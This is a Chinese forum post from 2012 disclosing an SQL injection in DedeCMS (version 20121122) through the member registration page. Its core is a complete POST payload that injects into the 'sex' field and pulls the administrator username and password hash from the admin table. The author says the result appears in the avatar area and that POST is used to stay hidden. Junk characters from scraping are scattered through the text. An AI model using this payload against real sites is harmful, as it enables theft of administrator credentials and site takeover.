dedecms版本 20121122
0 N0 m2 M/ W8 n9 j7 J d8 V( b% R" Y- e3 ?7 M: j
需要magic_quotes_gpc=Off- k& H: p' h3 e& Z- H0 I) Y4 [' A
* \; K3 Q6 w1 n) L) M, @+ E应该是没有什么大危害的漏洞.
* _! u) N' Z. O原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
* Q" L) J# k% z* s4 Y4 E+ D2 W! ^( x+ ~. W7 Y- D/ I& {$ `1 t3 ~1 c
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
% f& |, k' a( m$ bPOST提交以下数据,其实不用POST提交的,这样隐蔽点. {5 `) {. x$ q4 d+ e2 m6 C% z
- L. g* i8 r+ ?; u# e o
http:///de/member/reg_new.php6 w( C2 t. M6 Z. `" h
* Z9 w# |' m: M0 kPOST
- C" n* ~( h6 z; u% N4 R0 g
" ^4 `( i g1 i$ s1 X/ s4 Idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
* o: c. J: |! w: I2 |+ [( f
" Z& y4 |+ R3 @2 D3 M成功注册后,头像处里面有好玩的信息.
2 G6 F! V8 m" K+ W) `0 L3 C8 C
, s) S7 Z/ Q2 Z% w" [/ A |
发表于 2012-12-5 10:03:32
收藏
支持
反对